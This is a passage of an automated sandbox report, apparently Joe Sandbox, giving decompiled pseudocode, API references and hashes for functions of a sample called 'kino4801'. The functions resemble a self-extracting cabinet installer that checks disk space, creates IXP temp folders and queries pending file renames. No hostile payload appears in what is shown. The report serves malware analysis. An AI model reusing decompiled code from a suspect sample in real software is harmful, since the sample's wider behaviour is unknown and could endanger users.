				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x10d8004; // 0x261cebeb
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x10d9124 = E010D6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E010D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x10d9a34 & 0x00000008;
							if(( *0x10d9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x10d9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x10d9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E010D268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x10d9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10d89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x10d9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E010D44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x10d9124 = E010D6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E010D44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x10d9124 = E010D6285();
					_t66 = 0;
					L33:
					return E010D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x010d597d
0x010d5988
0x010d598f
0x010d599a
0x010d59a6
0x010d59a8
0x010d59af
0x010d59b9
0x010d59dd
0x010d59e4
0x010d59f1
0x010d59fe
0x010d5a0b
0x010d5a13
0x010d5a19
0x010d5a1b
0x010d5ba1
0x010d5baf
0x010d5bbd
0x010d5bd8
0x010d5bde
0x010d5be3
0x010d5bec
0x010d5bf0
0x010d5bfc
0x010d5c02
0x010d5c02
0x010d5c02
0x010d5c04
0x010d5c04
0x00000000
0x010d5c04
0x010d5a27
0x010d5a3a
0x010d5a46
0x010d5a48
0x010d5a4a
0x00000000
0x00000000
0x010d5a64
0x010d5a6a
0x010d5a6c
0x010d5abc
0x010d5ac2
0x010d5ac9
0x010d5aca
0x010d5aca
0x010d5acc
0x010d5acc
0x010d5acf
0x010d5ad1
0x00000000
0x00000000
0x010d5ad3
0x010d5ad6
0x010d5ad8
0x00000000
0x00000000
0x010d5ada
0x010d5adc
0x010d5add
0x010d5add
0x010d5ae0
0x00000000
0x00000000
0x00000000
0x010d5ae0
0x010d5ae2
0x010d5ae4
0x010d5ae6
0x010d5ae6
0x010d5ae6
0x010d5ae9
0x010d5aeb
0x010d5af0
0x010d5af6
0x010d5af8
0x010d5af9
0x010d5af9
0x010d5afb
0x00000000
0x00000000
0x010d5afd
0x010d5aff
0x010d5b00
0x010d5b03
0x00000000
0x00000000
0x00000000
0x010d5b03
0x010d5b05
0x010d5b08
0x010d5b20
0x010d5b27
0x010d5b52
0x010d5b52
0x010d5b5b
0x010d5b62
0x010d5b6b
0x010d5b6d
0x010d5b76
0x010d5b7d
0x010d5b83
0x010d5b7f
0x010d5b7f
0x010d5b7f
0x010d5b6f
0x010d5b72
0x010d5b72
0x010d5b85
0x010d5b98
0x010d5b9e
0x010d5b87
0x010d5b8f
0x010d5b8f
0x00000000
0x010d5b85
0x010d5b29
0x010d5b33
0x00000000
0x00000000
0x010d5b35
0x010d5b48
0x010d5b4a
0x00000000
0x010d5b4a
0x010d5b0f
0x010d5b16
0x00000000
0x010d5b16
0x010d5a7c
0x010d5a8a
0x010d5aa5
0x010d5aab
0x00000000
0x010d59bb
0x010d59c0
0x010d59c7
0x010d59d1
0x010d59d6
0x010d5c05
0x010d5c14
0x010d5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010D59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 010D59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010D5A13
MulDiv.KERNEL32(?,?,00000400), ref: 010D5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010D5A64
memset.MSVCRT ref: 010D5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010D5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010D5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010D5BFC

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: d0822e24ac5608404a3a36e22636b44bb45c0f40abfa437d6cbff72b107904b8
Instruction ID: 972995698ae11c8b85963d0a212d0b371adb78dbc3f3408b2c2ecebaa2ec8cf3
Opcode Fuzzy Hash: d0822e24ac5608404a3a36e22636b44bb45c0f40abfa437d6cbff72b107904b8
Instruction Fuzzy Hash: 4571A2B1A0131CAFEB269B68CC85BFA77BCEB48354F0440A9FD85D7144DA359E848F60

Uniqueness

Uniqueness Score: -1.00%

Function 010D4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E010D4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x10d9144 = E010D468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x10d9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x10d8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x10d8584, 0x841), 5); // executed
				}
				_t10 = E010D4EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E010D4CA0, E010D4CC0, E010D4980, E010D4A50, E010D4AD0, E010D4B60, E010D4BC0, 1, 0x10d9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x10d9148; // 0x0
						_t24 =  *0x10d8584; // 0x0
						E010D44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x10d1140, 0, E010D4CD0, 0, 0x10d9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x10d8584; // 0x0
					E010D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x10d9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x10d9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x10d91d8; // 0x0
						if(_t47 == 0) {
							E010D44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x10d8a38 & 0x00000001) == 0 && ( *0x10d9a34 & 0x00000001) == 0) {
						SendMessageA( *0x10d8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x010d4fe0
0x010d4fe6
0x010d4ff9
0x010d500d
0x010d5013
0x010d501a
0x010d5163
0x010d5163
0x010d5020
0x010d5027
0x010d5037
0x010d5051
0x010d5051
0x010d5057
0x010d505e
0x010d50a7
0x010d50ad
0x010d50b4
0x010d50e8
0x010d50e8
0x010d50ee
0x010d50ff
0x010d5104
0x010d5106
0x00000000
0x010d5106
0x010d50cd
0x010d50d3
0x010d50da
0x00000000
0x00000000
0x010d50dd
0x010d50e6
0x00000000
0x00000000
0x00000000
0x010d5060
0x010d5060
0x010d5070
0x010d5075
0x010d5107
0x010d5107
0x010d510e
0x010d5111
0x010d5117
0x010d5117
0x010d511f
0x010d5121
0x010d5127
0x010d5135
0x010d5135
0x010d5127
0x010d5141
0x010d5159
0x010d5159
0x00000000
0x010d515f

APIs

Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010D4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 010D5006
LockResource.KERNEL32(00000000), ref: 010D500D
GetDlgItem.USER32(00000000,00000842), ref: 010D5030
ShowWindow.USER32(00000000), ref: 010D5037
GetDlgItem.USER32(00000841,00000005), ref: 010D504A
ShowWindow.USER32(00000000), ref: 010D5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010D5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010D5159

Strings

*MEMCAB, xrefs: 010D50C7
CABINET, xrefs: 010D4FE6, 010D4FF7

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: f40f82768275516213b22594c4d198e6667e0f6dcef67a6f321cada8239acd5b
Instruction ID: 3b12bff3ac5644cfe2af12a8984bee31e9dea1774172b812a3f7b647d7de8505
Opcode Fuzzy Hash: f40f82768275516213b22594c4d198e6667e0f6dcef67a6f321cada8239acd5b
Instruction Fuzzy Hash: 53310A74741312BBE7305A7AEC89F673ABCA748755F044019FDC1E7589DABE8C408760

Uniqueness

Uniqueness Score: -1.00%

Function 010D53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010D53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x10d8004; // 0x261cebeb
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E010D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E010D1680(_t32, 0x104, _t20);
					E010D658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E010D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x10d8a20 = 1;
				goto L5;
			}

0x010d53ac
0x010d53b3
0x010d53b9
0x010d53bb
0x010d53bd
0x010d53bf
0x010d53d1
0x010d53d6
0x010d53e0
0x010d53e2
0x010d53f5
0x010d53fb
0x010d5402
0x010d540b
0x00000000
0x00000000
0x010d5413
0x00000000
0x00000000
0x010d5415
0x010d5416
0x010d5427
0x010d542a
0x010d542b
0x010d5434
0x010d5434
0x010d543a
0x010d544c
0x010d544c
0x010d5452
0x010d545a
0x00000000
0x00000000
0x010d545e
0x010d545f
0x00000000

APIs

Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D5452

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D53B7, 010D53E1, 010D541E
IXP, xrefs: 010D5419
IXP%03d.TMP, xrefs: 010D53C0

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-3746127100
Opcode ID: 15de62571f178e930967134ee440504b8342e6e9f237b787bfe601f1a4bd246b
Instruction ID: 651acfcacb5666bcb5b4e0deba754e89b407fa85b3b9c950dde2d3583f7e0bfb
Opcode Fuzzy Hash: 15de62571f178e930967134ee440504b8342e6e9f237b787bfe601f1a4bd246b
Instruction Fuzzy Hash: 58110171702304A7E320AB369C48FEF3A6DEFD5311F004069FAC6D3180CE7A894287A1

Uniqueness

Uniqueness Score: -1.00%

Function 010D5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E010D5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x10d8004; // 0x261cebeb
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x10d91e4;
					_t42 = 0x104;
					E010D1680(0x10d91e4, 0x104);
					L14:
					_t13 = E010D58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x10d9124 = 0;
							_t14 = 1;
							L24:
							return E010D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E010D597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x10d8a20; // 0x0
						if(_t61 != 0) {
							 *0x10d8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x10d9124 = E010D6285();
						goto L22;
					}
					 *0x10d8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E010D53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x10d91e4;
				E010D1781(0x10d91e4, 0x104, __ecx,  &_v268);
				if(( *0x10d9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E010D658A(_t48, 0x104, 0x10d1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E010D658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x010d5472
0x010d5479
0x010d5481
0x010d5484
0x010d551c
0x010d5521
0x010d5528
0x010d552d
0x010d552f
0x010d5539
0x010d554d
0x010d554d
0x010d5552
0x010d5585
0x010d5585
0x010d558b
0x010d558d
0x010d559d
0x010d559d
0x010d5557
0x010d555e
0x00000000
0x00000000
0x010d5560
0x010d5566
0x010d5569
0x010d556f
0x010d556f
0x010d5581
0x010d5581
0x00000000
0x010d5581
0x010d5545
0x010d557c
0x00000000
0x010d557c
0x010d5547
0x00000000
0x010d5547
0x010d548a
0x010d5490
0x010d5497
0x00000000
0x00000000
0x010d549d
0x010d54ab
0x010d54b4
0x010d54c0
0x010d550c
0x010d5511
0x010d5515
0x00000000
0x010d5515
0x010d54c9
0x010d54d6
0x010d54d8
0x010d54fe
0x010d5503
0x010d5507
0x00000000
0x010d5507
0x010d54da
0x010d54dd
0x010d54f7
0x00000000
0x010d54f7
0x010d54df
0x010d54e2
0x010d54f0
0x00000000
0x010d54f0
0x010d54e7
0x00000000
0x00000000
0x010d54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D556F

Part of subcall function 010D53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D53FB
Part of subcall function 010D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D5402
Part of subcall function 010D53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D541F
Part of subcall function 010D53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D542B
Part of subcall function 010D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010D5434

Strings

i386, xrefs: 010D54FE
alpha, xrefs: 010D54F0
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D547D, 010D5481, 010D54AB, 010D551C, 010D553C, 010D5568
ppc, xrefs: 010D54E9
mips, xrefs: 010D54F7

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-4185119251
Opcode ID: c4e34e9f24eea569ed9133e4d25234710232d6bfd9d3dc8ae0621cfe435231de
Instruction ID: fd819dcacf4582721589cc42e2be9cf07f8fcb7b62f7ad9da4688b69ee54edfd
Opcode Fuzzy Hash: c4e34e9f24eea569ed9133e4d25234710232d6bfd9d3dc8ae0621cfe435231de
Instruction Fuzzy Hash: 49314770B013119BDB219B3D9C14ABE7BFAAF91244B84416AEDC2C318CDF76CA018795

Uniqueness

Uniqueness Score: -1.00%

Function 010D256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E010D256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E010D24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x010d2572
0x010d2573
0x010d2575
0x010d2578
0x010d257d
0x010d2627
0x010d2583
0x010d2586
0x010d2589
0x010d25eb
0x010d2607
0x00000000
0x010d2609
0x010d261a
0x00000000
0x010d261a
0x00000000
0x010d258b
0x010d258b
0x010d259e
0x010d25b2
0x010d25ba
0x010d25cb
0x010d25d1
0x010d25d6
0x010d25da
0x010d25dd
0x010d25dd
0x010d25e3
0x010d25e3
0x010d25e3
0x010d258b
0x010d2589
0x010d262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,010D4096,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?), ref: 010D25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?,010D4096), ref: 010D25CB
RegCloseKey.KERNELBASE(?,?,010D1ED3,00000001,00000000,?,?,010D4137,?,010D4096), ref: 010D25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,010D4096,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?), ref: 010D25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010D4096,00000000,00000000,00000000,00000000,?,010D1ED3,00000001,00000000), ref: 010D261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 010D25A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010D25F5
PendingFileRenameOperations, xrefs: 010D25C3

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

